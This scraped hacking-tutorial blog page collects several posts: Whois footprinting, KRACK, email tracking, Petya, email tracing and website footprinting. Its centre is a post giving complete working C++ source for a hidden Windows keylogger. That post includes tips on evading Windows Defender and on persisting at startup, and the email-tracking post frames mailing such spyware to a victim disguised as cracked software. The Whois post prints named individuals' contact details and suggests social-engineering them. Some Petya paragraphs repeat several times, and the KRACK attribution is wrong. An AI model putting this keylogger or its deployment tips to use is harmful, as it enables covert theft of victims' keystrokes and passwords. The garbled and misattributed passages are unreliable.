Whois Lookup - Gather Information through Whois Footprinting

Hello friends... This is out 100th article today. And we are excited to get response from all of you. Just before starting to study this topic, I would like to inform you that all the articles from now onward will be most important in hacking. Because this is the point at which real hacking starts. The previous articles might not seem much interesting to all but they were important for the "n00bs". A reason why this site will be the best in future - We post everything. Everything at one place - sooner or later this will become number one site to study hacking.

Now, related to this article... Basically, everything from now on will be related to hacking and IP address and concepts of network and domains in main. So, I suggest you to read the articles on IP address, domains and networking first. This is basically important as you know - A server is hacked by its IP address and an attacker is also tracked by using a unsecured network and IP address.

What is Whois?

Whois, as the name implies, is a protocol granting users access to the massive database of registered owners of an internet resource such as an autonomous system, an IP block, and a domain name, among others. In other words, it is a query and response protocol that lets users find out ‘who is’ the registered owner of a domain by simply typing the exact domain name.

The protocol, in return, will deliver the response in a format that is readable to the human. A more detailed specification of the Whois protocol can be found in RFC 3912. Here are a few reasons why people are conducting a Whois search:

• Domain buying and trading
• Check domain expiration
• Find out domain owner identity
• Find out location and address of the owner
• Marketing purposes

Based on the above usage, the importance of a Whois search is clear. But why is Whois important to Hackers? And how is it important? These are the two questions which will be answered here...

How to perform a Whois Lookup?

To understand the importance of Whois in hacking, we will study an example of whois lookup. And to study the example, you need to know about how to perform whois lookup.

Doing a Whois lookup is very simple and quick. There are only a few easy steps to make, and the results will be instantly shown in a few seconds. The procedures are as follows:

1. Visit https://whois.net
2. Enter the domain name your want to lookup in the search box
3. Hit the ‘GO’ button

The results will immediately show up in the next few seconds, depending on your internet speed. Other websites can also be used for Whois Lookup. My personal favourite is - https://www.whois.com/whois/

Below is the information obtained by whois lookup of the domain "gtu.ac.in".

Domain Information
Domain: gtu.ac.in
Registrar: ERNET India (R9-AFIN)
Registration Date: 2008-07-15
Expiration Date: 2026-07-15
Updated Date: 2017-01-27
Status: ok

Name Servers:
ns-602.awsdns-11.net
ns-355.awsdns-44.com
ns-1775.awsdns-29.co.uk
ns-1501.awsdns-59.org

Registrant Contact
Name: gujarat technological university
Organization: gujarat technological university
Street: JACPC building l d college of engineering campus
City: ahmedabad
Postal Code: 380015
Country: IN
Phone: +91.9909980005
Email: registrar@gtu.ac.in

Administrative Contact
Name: n n bhuptani
Organization: gujarat technological university
Street: JACPC building l d college of engineering campus
City: ahmedabad
Postal Code: 380015
Country: IN
Phone: +91.9909980005
Email: registrar@gtu.ac.in

Technical Contact
Name: Harshad Borisa
Organization: gujarat technological university
Street: Gujarat Technological University JACPC building L. D. college of engineering campus
City: ahmedabad
State: Gujrat
Postal Code: 380015
Country: IN
Phone: +91.7926301500
Email: rupendra@gtu.edu.in

As you can clearly see, whois lookup provides us with the details such as:

• Domain expiry date
• Email address of owner
• Mobile number of owner
• Address of owner
• IP address or IP block
• And much more...

Based on this information, the importance of whois is determined. Take note that the registrant’s details may vary based on the Top Level Domain, or TLD. Some TLDs will not show all information of the registrant, while others will not show any detail at all. Also, the owners’ information may be concealed if they are subscribed to the domain privacy, and the domain registrar’s information and contact details will be shown, instead.

Importance of Whois Lookup

Whois lookup is useful in many ways depending on the motive of the person performing lookup. There are various things to be applied on whois lookup but the two of them which are mostly used are listed below...

• If you are defender, it can help you in tracking down the attacker - You can perform whois lookup on the attacker's IP address and find out the ISP and the location of the ISP which provided IP address to the attacker. Then contact the ISP to reveal other details.
• If you are on the attacking side, it helps you finding targets to attack - Based on the information available, you can contact the owner and try some social engineering tricks on him/her.

Being able to identify the owner of a domain is one advantage that benefits many users. However, there is also a major disadvantage that comes with it, which is lack of privacy on the part of the domain owner since their identities are made public. Prior to the domain registration, user are required to reveal their full name, address, and contact details such as email address and phone numbers. This is in compliance to the stipulations of Internet Corporation for Assigned Names and Numbers or ICANN, mandating that the registrants’ details be made publicly available through the Whois directories. This provides an entry point for spammers and marketers to grab email addresses and phone numbers for their marketing and spamming activities.

Due to the massive criticism on lack of privacy, most domain registrants like GoDaddy and Hostgator are now offering domain privacy that provides privacy to the owners by concealing some details of their personal information. In this case, the contact information of the registrar is displayed instead of the domain owner. But such feature is available at a premium price.

The above article provides the complete information about Whois Lookup. If you still don't understand how to use it, comment below your queries. If you still don't understand where to use it, then wait for it.

Remember - Hacking is not performed using a single trick or tool. One needs to combine the power of everything he/she has to perform hacking. And you are learning a small part of it to develop your powers. Learn everything separately and combine them at a time.

Read More

KRACK - WiFi devices all over the world are Hackable..! - Everyone's data is at risk - Everything you need to know

Hello friends.. Here you are about to find the most important and something unbelievable about the WiFi networks we use daily. What if someone tell you that your WiFi is hackable! Or what if I tell you that all of your private data in this world is hackable. And everyone is at risk! Some of you won't believe me but this has become a reality and you can't neglect it.

Till now, all we knew about WiFi hacking was hacking passwords and WiFi sniffing attacks. Also these attacks were not successful on all WiFi devices. But now, there is something big. All the wifi devices are hackable. And the attacker can get all your private data through it. Hence, this is something serious that should be taken care of. I expect you to read this whole article, take the corrective steps and share this post on facebook, whatsapp and all other social media websites to make people aware of the the big risk they are in.

Introduction

Most vulnerabilities go unnoticed by the majority of the world’s population even if they affect several million people. But this news, published yesterday, is probably even bigger than all other security breaches and affects several billion people all over the world: Researchers have found a bunch of vulnerabilities that make all Wi-Fi networks insecure.

Researchers have found out that devices based on Android, iOS, Linux, macOS, Windows, and some other operating systems are vulnerable to some variation of this attack, and that means almost any device can be compromised. They called this type of attack a key reinstallation attack, or KRACK for short.

What is KRACK?

The attack is against the 4-way handshake of the WPA2 protocol. This handshake is executed when a client wants to join a protected Wi-Fi network, and is used to confirm that both the client and access point possess the correct credentials (e.g. the pre-shared password of the network). At the same time, the 4-way handshake also negotiates a fresh encryption key that will be used to encrypt all subsequent traffic. Currently, all modern protected Wi-Fi networks use the 4-way handshake. This implies all these networks are affected by (some variant of) our attack. For instance, the attack works against personal and enterprise Wi-Fi networks, against the older WPA and the latest WPA2 standard, and even against networks that only use AES. All the attacks against WPA2 use a novel technique called a key reinstallation attack (KRACK).

Now to understand how KRACK works, we need to know how the WiFi devices work.

The process of connecting to a Wi-Fi network

When a client joins a network, it executes the 4-way handshake to negotiate a fresh encryption key. It will install this key after receiving message 3 of the 4-way handshake. Once the key is installed, it will be used to encrypt normal data frames using an encryption protocol. However, because messages may be lost or dropped, the Access Point (AP) will retransmit message 3 if it did not receive an appropriate response as acknowledgment. As a result, the client may receive message 3 multiple times. Each time it receives this message, it will reinstall the same encryption key, and thereby reset the incremental transmit packet number (nonce) and receive replay counter used by the encryption protocol. The researchers at Kaspersky Lab found that an attacker can force these nonce resets by collecting and replaying retransmissions of message 3 of the 4-way handshake. By forcing nonce reuse in this manner, the encryption protocol can be attacked, e.g., packets can be replayed, decrypted, and/or forged. The same technique can also be used to attack the group key, PeerKey, TDLS, and fast BSS transition handshake.

I am damn sure that some of our readers will not understand what is written above (as it requires the concepts of networking to be clear) but the latter part will make everything clear.

How does the KRACK attack work?

To perform this attack, the attacker has to set up a Wi-Fi network with the same name (SSID) as that of an existing network and target a specific user. When the attacker detects that the user is about to connect to the original network, they can send special packets that make the device switch to another channel and connect to the fake network with the same name.

After that, using a flaw in the implementation of the encryption protocols they can change the encryption key the user was using and thus access all of the information that the user uploads or downloads.

One may argue that there’s another layer of security — the encrypted connection to a site, e.g., SSL or HTTPS. However, a simple utility called SSLstrip set up on the fake access point is enough to force the browser to communicate with unencrypted, HTTP versions of websites instead of encrypted, HTTPS versions, in cases where encryption is not correctly implemented on a site (and that is true for quite a lot of websites, including some very big ones).

So, by using this utility in their fake network, the attacker can access the users’ logins and passwords in plain text, which basically means stealing them. And not only the plain login passwords but all the data which goes into plain text form is accessible by the attacker. Even OTPs are accessible. So, now you know - What the heck.!

Let me give you a short information about SSLStrip. SSLStrip is a type of MITM attack that forces a victim's browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is "stripping" https:// URLs and turning them into http:// URLs. Hence, the data is transmitted in plain text form rather than encrypted form. So, finally you know that everyone including you is at risk.

How to stay secure?

The fact that almost every device in almost every Wi-Fi network is vulnerable to KRACK sounds quite scary, but like pretty much any other type of attack, this one is not the end of the world. Here are a couple of tips on how to stay safe. First of all, you should understand that - here the vulnerability lies in the protocols designed. Hence, you cannot do anything extra rather than depending on the company of your WiFi device.

• Always check to make sure there’s a green lock icon in the address bar of your browser. That lock indicates that an HTTPS (encrypted and therefore secure) connection to this particular website is being used. If someone attempts to use SSLstrip against you, the browser will be forced to use HTTP versions of websites, and the lock will disappear. If the lock is in place, your connection is still secure.
• Most of appliance manufacturers are in the process of issuing firmware updates that can fix the issue with key reinstallation. So check if there are fresh firmware updates for your devices and install them as soon as possible.
• You can secure your connection using a VPN, which adds another layer of encryption to the data transferred from your device.

So, now you know what to do - share this and spread awareness. Thank you..

Read More

Email Tracking - Track your email to know if the receiver opened it, clicked on a link and much more..

Hello fellas, here you are going to learn about Email Tracking. Email tracking is a method used to obtain information from sent emails. For a smooth start, let me give you an example. Suppose that you are the attacker. You have created a file which is trustworthy by its name (let the file-name be "IDM Cracked Latest Version"). But along with this file, you did also bind (attach) an executable in background (hidden from user). This executable is nothing else but a keylogger. Hence, the file will seem useful to user but is really a spyware. Now, you mail this file to the victim and wait for him/her to open it. Here is the trap.

Click here to learn how to create a keylogger and download a keylogger file from here

Most of email services doesn't provide a way for the sender to know if his/her email was seen by the receiver or just ignored. In WhatsApp, Facebook and any other messaging service, we can know if our message was read or ignored. But none of email service provide us with this feature. So if you sent a spyware file to victim, it will take for weeks to know if he/she downloaded the file or not. And your attack will be unsuccessful or it will give delayed result. This is a simple example where email tracking becomes handy. So that now we have seen the importance of Email Tracking, let us study the process in depth.

There are in general, two methods to obtain information from Emails.

1. Email Tracing
2. Email Tracking

Yes, Email Tracing is different from Email Tracking. To study the difference and learn what Email Tracing is, click here.. Both the procedures (Email tracing and tracking) are independent. Hence, you can directly study this article to learn tracking irrespective of studying email tracing. But I would still suggest you to go through email tracing at least once before continuing, as its an interesting and important topic.

What is Email Tracking?

To be technical, it’s a method for monitoring email delivery through the use of a digitally time-stamped record to show the exact time and date an email was opened. You send an email. Your victim opens it. You get a notification in the corner of your screen and have the time of the email being opened on record. Every time the email is opened or a link is clicked, you’ll know it happened.

There are mainly two kind of receipts required when an email is sent.

1. Delivery Receipt - Indicates if the email is delivered or not. This receipt is provided in-built by all the email services.
2. Read Receipt - Indicates if the email you sent is read by the receiver or just ignored. This service is not provided by most of email service providers. But we can still modify the service provider functions to get a read receipt.

Click to view full size image

And Email Tracking is a methodology of obtaining read receipts of any sent email. So now let us see the advantages of email tracking before knowing how it actually works.

How is Email Tracking useful?

Email Tracking is mainly used in two fields - Spying and Marketing. Initially, email and link tracking feels like spying on your customers or potential clients. However, nothing nefarious is happening. Using email tracking actually saves time and increases productivity for both you and the customer. When you see a notification you know your email has been opened. You no longer have to send the “did you get my email?” message unless they actually haven’t gotten it.

Also, you’ll know exactly when people are sitting down at their desks and has your business on their mind. If you reach out to them close to this time, you’ll save your client time by contacting them when they’ve already got your company on their mind. Instead of trying to get them at a random time on a random day, they’ll already be thinking about you, and less likely to be busy on something else. If you notice an email being opened multiple times, then you’ll know there’s a higher chance for engagement with them. You can tell if they’re checking information you sent them before or after a call/meeting.

Email tracking is great for:

• Knowing when to follow up with people.
• Providing specific information based on the feedback (For example: If they keep clicking an email about a certain product, you could send more information about it).
• Helping marketing know what’s getting clients to click onward and what’s failing to get their attention.
• Giving peace of mind that you’re getting to clients.

Now let us see how Email Tracking works.

How does Email Tracking work in general?

To understand email tracking, we must first know the importance of Web-beacon or Tracking-pixel. 

• Web-beacon:A web beacon is an object embedded in a web page or email, which unobtrusively (usually invisibly) allows checking that a user has accessed the content. Common uses are email tracking and page tagging for web analytics.
• Tracking-pixel: Tracking pixel is a type of Web-beacon. A tracking pixel is a transparent image, measuring one pixel by one pixel (very small). Once imbedded on a Web page or in an email, a tracking pixel connects to a PHP file stored on your Web server. Each time the tracking pixel is viewed, it pulls the PHP file from the server, creating a logged event that lets you know exactly when and for how many times customers accessed the page or opened the message.

Now that we know about tracking pixel, we can note two of its important properties - Its transparent and when it is accessed, the event is logged along with the date-and-time stamp in the log file. When you see the log file, you can tell about when and how many times the image was accessed.

Email Tracking works the same way. You need to imbed the tracking-pixel in the email. I used the word "Imded" and not "Embed". When you embed an image, the image loads in the email and is sent to the receiver as an attachment. Hence, the log file will store the time when the email was sent - as tracking-pixel was attached (accessed) when the email was created. But when you imbed an image, a html tag including the link (<img src="link">) to that image is sent in the email. Hence, the image is loaded when the receiver opens the email. So, the log file will save the time when the image was accessed by the receiver which indirectly indicates when email was seen by the receiver.

Limitations of Email Tracking Pixel

Typically, there are no limitations of Email Tracking Pixel but there are problems which occur due to following reasons:

• The image isn’t loaded when an email is opened. Many web, desktop, and mobile email clients do not open images by default. Especially from unknown senders.
• An ad or tracking blocker is being used. Several extensions exist that block email opens from being reported.
• The image is loaded, but the email isn’t actually open. Some email clients render images as a preview, and will trigger email open false positives. The same effect is produced by Gmail's Image Caching feature.
• Some enterprise security systems will block emails w/ open tracking pixels or tracked links. Worse than email tracking not working, your email just might not actually get through.

The above was a brief list of what can cause email tracking to fail. The most important of the above is Gmail's Image Caching feature. (I cannot mention about it here due to the limitations of size og my article but you can google it.)

Some of useful tools for Email Tracking

Email tracking can be done with the help of three methods - Manual Method, Web-browser Extensions and Online Tools. Manual method is a bit harder and lengthy so I will mention it in my upcoming articles. The extensions and tools are listed here:

• Email Tracking Extension for Chrome
• MailTrack
• HubSpot

If you know about other good tools, write the name and link in comments. Till then, stay connected.. Thank you..

Read More

Making a simple C++ Keylogger - Download with Source Code

Hello friends.. Today I am going to discuss here about the most awaiting post by our readers. You are going to learn about making a running and undetectable keylogger in C++ programming language. And you will be amazed to know that you don't need to have a complete knowledge of C++ to learn this thing. As I am here to explain you in detail what happens by execution of which code of line.

Still, there are some prerequisites to learn how to design a Keylogger and get the knowledge of different types of keylogger and how they work. You don't need to know the programming language but you still need to know how a keylogger really works in background and an algorithm to design it. Hence, before continuing your reading of this article, I recommend you to read the below to articles for ease. (Its because making a keylogger is not a child's task. You should have complete knowledge of it.)

Links:

• A simple algorithm to design a Keylogger
• Types on Keylogger and how each type works

After reading the above articles, you can easily move towards reading this article. In the first article i.e. steps to make a keylogger, you have learned about two things necessary in designing a keylogger. These two most important tasks are:

1. You need to identify a function which identifies and triggers when a key is pressed.
2. You need to code the keylogger to run in stealth (hidden) mode.

The first task is carried out by a function --GetAsyncKeyState()-- which is a part of windows API in C++. Hence, this function returns a specific value when the ASCII value of the character key pressed is passed as an argument. Now let us understand the making of a C++ Keylogger taking a closer look at its code.

C++ Keylogger Code:

#include<iostream>
#include<fstream>
using namespace std;     //used to avoid the compilation errors because of redefinition of variables.
#include<windows.h>
#include<winuser.h>


int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,SW_HIDE);
}

We will study three basic things in this piece of code:

1. The working of GetAsyncKeyState() function.
2. The working of user-defined Save() function.
3. The working of user-defined Stealth() function.

You cannot copy this piece of code from my site. Hence, I have given a direct download link for this piece of code. Click here to download the Keylogger Source File.

Understanding: 

GetAsyncKeyState function: It is a Windows API function available in C++. It determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState. If the function succeeds, the return value specifies whether the key was pressed since the last call to GetAsyncKeyState, and whether the key is currently up or down. If the most significant bit is set, the key is down, and if the least significant bit is set, the key was pressed after the previous call to GetAsyncKeyState. 

• GetAsyncKeyState function example:
  if(GetAsyncKeyState(VK_UP))
{
printf("The Up Arrow Has Been Pressed\n");
}

Save function:The save function takes in the ASCII value of keystroke pressed as an argument. It then compares the value with each keystroke individually. If the comparison expression returns TRUE, it stores the keystroke pressed in a file with the help of a character variable. (One can also use Switch-Case instead of if-else ladder.)

Stealth function: Here is simple explanation of it.

HWND stealth;

Declares a window handle.

AllocConsole();

Allocates a new console for the calling process.

stealth = FindWindowA("ConsoleWindowClass", NULL);

Find the window handle with class name "ConsoleWindowClass".

ShowWindow(stealth,SW_HIDE);

Hide it.

Pros/Cons

Rather than mentioning the pros and cons here, I would like to simply mention the things this keylogger cannot do. The very first thing is, when you run this keylogger file, it will be easily detected by the Windows Defender. This is because of the file writing method we choose in this program. To avoid this, you can use the ofstream write("Filename.txt", ios::app) method to open a file in write mode rather than using file pointer method i.e, FILE *OUTPUT_FILE; OUTPUT_FILE = fopen(file, "a+"). Also, you need to change the function to write instead of fprintf. There is a small difference in its working but a master of C++ would find it easy.

Next thing this keylogger can't do is, it can't send you the log file via email. Its because, at the start of my article I mentioned Types of Keylogger. How you get the log file from victim's computer depends on the type of keylogger. And hence, it is not possible for me to code a keylogger each of one type. Still, one can add its code if you are a PRO coder!

The last thing you need to know is, you have to attach the executable file in startup. Else, everytime the victim restarts his/her laptop, this keylogger file will be removed from the main memory and hence it will stop functioning.

How to Stop the Keylogging activity

You might have thought that you know how to run this keylogger and record keystrokes. But ever thought how to stop it..! It is running in stealth mode i.e. it is not running in a window that you can close it simply by clicking on Close Button. The simplest way to stop this Keylogger is open the Task Manager and find the keylogger by is executable file name and end it process/task.

I hope you find this article interesting. Also I think you may be having several doubts related to this piece of code. Feel free to ask queries in the comment box and share this article with your friends and spread knowledge. Thank you..

Read More

The Newer Version of Petya is Not a Ransomware, It's a Destructive Data Wiper

Short Summary:

Till now, we were thinking of Petya being a Ransomware. But this new version is beyond the limits. A ransomware is generally a malware that encrypts your files and provides you a decryption key after you pay the ransom to attacker(s). But Petya works somewhat different. It encrypts the MBR and MFT in windows and replaces it with a malicious code. Also, it doesn't take a backup of encrypted data. Hence, even if you pay the ransom, you will not get you data back.

Now let us see the working of this malware in detail and the research work carried out on it. Also, many security researchers found that this malware was spread as a Ransomware because the attackers wanted to divert society from WannaCry to this malware. Let us see all these in detail.

Petya is not a Ransomware

Yes, the Petya ransomware attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all.

According to a new analysis, the virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems.

Comae Technologies Founder Matt Suiche, who closely looked the operation of the malware, said after analyzing the virus, known as Petya, his team found that it was a "Wiper malware," not ransomware.

Security experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack on Ukraine to a malware outbreak.

"We believe the ransomware was, in fact, a lure to control the media narrative, especially after the WannaCry incident, to attract the attention on some mysterious hacker group rather than a national state attacker," Suiche writes.

Yes, the Petya ransomware attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all.

According to a new analysis, the virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems. 

Comae Technologies Founder Matt Suiche, who closely looked the operation of the malware, said after analyzingthe virus, known as Petya, his team found that it was a "Wiper malware" not ransomware.

Security experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack on Ukraine to a  malware outbreak.

"We believe the ransomware was, in fact, a lure to control the media narrative, especially after the WannaCry incident, to attract the attention on some mysterious hacker group rather than a national state  attacker," Suiche writes

What's new in Petya! Is is Powerful?

Petya is a nasty piece of malware that, unlike other traditional ransomware, does not encrypt files on a targeted system one by one. Instead, Petya reboots victims computers and encrypts the hard drive's Master File Table (MFT) and renders the Master Boot Record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk.

Then Petya ransomware takes an encrypted copy of MBR and replaces it with its own malicious code that displays a ransom note, leaving computers unable to boot. However, this new variant of Petya does not keep a copy of replaced MBR, mistakenly or purposely, leaving infected computers unbootable even if victims get the decryption keys.

Also, after infecting one machine, the Petya ransomware scans the local network and quickly infects all other machines (even fully-patched) on the same network, using EternalBlue SMB exploit, WMIC and PSEXEC tools.

Does Paying Ransom Get Your Files Back?

So far, nearly 45 victims have already paid total $10,500 in Bitcoins in hope to get their locked files back, but unfortunately, they would not. It's because the email address, which was being set-up by the attackers to communicate with victims and send decryption keys, was suspended by the German provider shortly after the outbreak. As the email address is suspended, there is no way of contact or communication. Meaning, even if victims do pay the ransom, they will never recover their files. Kaspersky researchers also said same.

"Our analysis indicates there is little hope for victims to recover their data. We have analyzed the high-level code of the encryption routine, and we have figured out that after disk encryption, the threat actor could not decrypt victims’ disks," the security firm said.

"To decrypt a victim’s disk threat actors need the installation ID. In previous versions of 'similar' ransomware like Petya/Mischa/GoldenEye this installation ID contained the information necessary for key recovery."

If claims made by the researcher is correct that the new variant of Petya is a destructive malware designed to shut down and disrupt services around the world, the malware has successfully done its job.

List of Countries affected by Petya till now..!

The virus primarily and massively targeted multiple entities in Ukraine, including the country's local metro, Kiev's Boryspil airport, electricity supplier, the central bank, and the state telecom.

Other countries infected by the Petya virus included:

• Russia
• France
• Spain
• India
• China
• The United States
• Brazil
• Chile
• Argentina
• Turkey
• And South Korea.

Finally, Petya proves to be very harmful Data Wiper malware and we should take measures to prevent this malware affecting our computers. Till now, the exact preventive measures are not know but one can try the steps taken when WannaCry was affected. Its because both malware uses SMB Windows exploit to spread across world. Hence, we can slow it down. Click here to read the preventive measures.

Support us with your views on this malware and any update if necessary. Comment you views and Stay Connected..!

Yes, the Petya ransomware attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all.

According to a new analysis, the virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems.

Comae Technologies Founder Matt Suiche, who closely looked the operation of the malware, said after analyzing the virus, known as Petya, his team found that it was a "Wiper malware," not ransomware.

Security experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack on Ukraine to a malware outbreak.

"We believe the ransomware was, in fact, a lure to control the media narrative, especially after the WannaCry incident, to attract the attention on some mysterious hacker group rather than a national state attacker," Suiche writes.

Yes, the Petya ransomware attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all.

According to a new analysis, the virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems.

Comae Technologies Founder Matt Suiche, who closely looked the operation of the malware, said after analyzing the virus, known as Petya, his team found that it was a "Wiper malware," not ransomware.

Security experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack on Ukraine to a malware outbreak.

"We believe the ransomware was, in fact, a lure to control the media narrative, especially after the WannaCry incident, to attract the attention on some mysterious hacker group rather than a national state attacker," Suiche writes.

Yes, the Petya ransomware attacks that began infecting computers in several countries, including Russia, Ukraine, France, India and the United States on Tuesday and demands $300 ransom was not designed with the intention of restoring the computers at all.

According to a new analysis, the virus was designed to look like ransomware but was wiper malware that wipes computers outright, destroying all records from the targeted systems.

Comae Technologies Founder Matt Suiche, who closely looked the operation of the malware, said after analyzing the virus, known as Petya, his team found that it was a "Wiper malware," not ransomware.

Security experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack on Ukraine to a malware outbreak.

"We believe the ransomware was, in fact, a lure to control the media narrative, especially after the WannaCry incident, to attract the attention on some mysterious hacker group rather than a national state attacker," Suiche writes.

Read More

Email Footprinting - Trace an Email and Collect Information from it..!

In the previous article, I wrote on Website Scraping, Website Monitoring and Website Mirroring. It contained the methodology of gathering information from a website. Similarly, this article refers to gathering information from an Email.

An Email can give us access to a lot of sensitive information. Information such as:

• Sender's Email
• Sender's Name
• Sender's Physical Location
• The Path through which Email travelled - The transfer agents in between
• Sender's IP Address
• Active Ports of Sender

and much more information about the sender can be known

These sensitive information can lead a Hacker to access many of the data about the target. So, in this article we are going to study about how to collect information from Emails.

There are in general, two methods of gathering information from emails.

• Tracing Email
• Tracking Email

And here we are going to study tracing an email. Tracking email is not the part of Email Footprinting but still we will study it later. For now, let us not go into deep about email tracking and just study only the difference between Email Tracing and Email Tracking.

Email Tracing vs. Email Tracking

Tracing generally refers to movement in backward direction while tracking refers to movement in forward direction. A common example is, when you order an item on amazon, they let you to track the delivery of that item. Hence you can track where your object is right now. That is referred to as tracking. Object is yours and you are spying on your object. While in tracing, object belong to someone else and you are spying on other's object.

When you send a mail and you start spying on it (if receiver clicked a link in your mail or if receiver opened your mail or any other activity), then it is called Email Tracking. Similarly, when you get an email in your inbox and you spy on the that email (move backwards and get information about from where the mail was sent and information of every sender), it is called Email Tracing.

Now that we know about Email Tracing and what type of information can be obtained, let us see the topic in brief.

Email Header

We know that we can obtain information about sender from Email. Think somewhat deeper.. There might be a source from which we get all these information. Yes, that source is the Email Header.

In an e-mail, the body (content text) is always preceded by header lines that identify particular routing information of the message, including the sender, recipient, date and subject. Some headers are mandatory, such as the FROM, TO and DATE headers. Others are optional, but very commonly used, such as SUBJECT and CC. Other headers include the sending time stamps and the receiving time stamps of all mail transfer agents that have received and sent the message.

Mail Transfer Agents (MTA) are the intermediate routers, computers or servers that help in transfer of email from a sender to the receiver. Generally, sender and receiver are not connected by a direct connection. Hence, we use MTAs to create a path between sender's mail box (on sender's mail server) and receiver's mail box (on receiver's mail server). To know more about How Email system works, click here..

In other words, any time a message is transferred from one user to another (i.e. when it is sent or forwarded), the message is date/time stamped by a mail transfer agent (MTA) - a computer program or software agent that facilitates the transfer of email message from one computer to another. This date/time stamp, like FROM, TO, and SUBJECT, becomes one of the many headers that precede the body of an email. Hence, there might be multiple sub-headers in an email header providing information about each MTA unit associated in the transfer.

Headers Provide Routing Information

Besides the most common identifications (from, to, date, subject), email headers also provide information on the route an email takes as it is transferred from one computer to another. As mentioned earlier, mail transfer agents (MTA) facilitate email transfers. When an email is sent from one computer to another it travels through a MTA. Each time an email is sent or forwarded by the MTA, it is stamped with a date, time and recipient. This is why some emails, if they have had several destinations, may have several RECEIVED headers: there have been multiple recipients since the origination of the email. In a way it is much like the same way the post office would route a letter: every time the letter passes through a post office on its route, or if it is forwarded on, it will receive a stamp. In this case the stamp is an email header.

An example of simple email header with only one sender an receiver tag is shown below:

Click to view full size image

The above example is the simplest header of all. But still it might look complicated to you. Hence, is proves that tracing the email manually is complex. But we need to know the manual method too, because only using automated tools doesn't provide perfection.

Manual method to trace an Email

To find the information from a received email you're curious about, open the email and look for the header details. How you find that email's header depends on the email program you use. Do you use Gmail or Yahoo? Hotmail or Outlook? 

For example, if you're a Gmail user, here are the steps you'd take:

1. Open the message you want to view
2. Click the down arrow next to the "Reply" link
3. Select "Show Original" to open a new window with the full headers

Similarly, you can find a method from Google for other Email Programs. If I write methods for all of them, article would become lengthy.

Automated Tools for Email Tracing

Here is a small list of some of the best tools for Email Tracing..

• eMailTrackerPro - http://www.emailtrackerpro.com/
• WhatIsMyIPaddress - http://whatismyipaddress.com/trace-email

You can easily search Google for other tools.

As I told, email tracking and email tracing are different. I will teach you about Email Tracking in my next article. So, stay connected..

Read More

Website Footprinting - Website Scraping, Website Mirroring and Website Monitoring

While Footprinting refers to gathering the needed information and getting knowledge of how things work, website footprinting refers to extracting data from a website and knowing how the site works. Basically, working of a website is known on the basis of the javascript files or the js code which executes on an activity. There are many other things which determine the methodology of working od a site and this may be helpful to the attacker. So, let us explore more on the terms and methods.

Website Footprinting is the first step towards hacking a website. To hack a site, we need information such as:

• How the site works?
• How frequent are new article posted on site?
• Is the admin of website active/inactive?
• What type of data is available on the site?
• And much more...

These can be achieved by footprinting a website. Following all the steps in website footprinting leads us to get confidential information from the site and know how the site works in reality. Let us explore more about this.

Website Scraping

The best way to extract information from a webpage is to open the page in browser and then examine it's source code and cookies used by the site. But examining the source code doesn't provide all the needed information and looking at cookies manually is tiresome. So, the concept of extracting data from a website came into existence.

Web Scraping (also termed Screen Scraping, Web Data Extraction, Web Harvesting etc.) is a technique employed to extract large amounts of data from websites whereby the data is extracted and saved to a local file in your computer or to a database in table (spreadsheet) format.

